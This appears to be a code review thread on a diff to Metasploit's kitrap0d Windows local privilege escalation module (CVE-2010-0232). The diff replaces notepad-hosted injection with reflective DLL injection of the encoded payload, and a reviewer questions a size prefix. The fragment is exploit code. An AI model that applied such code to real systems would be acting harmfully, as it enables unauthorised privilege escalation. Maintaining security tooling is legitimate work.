modules/exploits/windows/local/ms10_015_kitrap0d.rb

```diff
@@ -68,28 +69,14 @@ def exploit
       fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
     end
 
-    print_status("Launching notepad to host the exploit...")
-    process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
-    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
-    print_good("Process #{process.pid} launched.")
+    print_status("Reflectively injecting payload and triggering the bug...")
+    encoded_payload = payload.encoded
+    execute_dll(
+      ::File.join(Msf::Config.data_directory, "exploits", "CVE-2010-0232", "kitrap0d.x86.dll"),
+      [encoded_payload.length].pack('I<') + encoded_payload
```

Comment:
This one does not look like the payload should have the size prefixed to it.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15384/commits/4ab1b6ca11cc7b025da6094ec4552eaaa8ad657b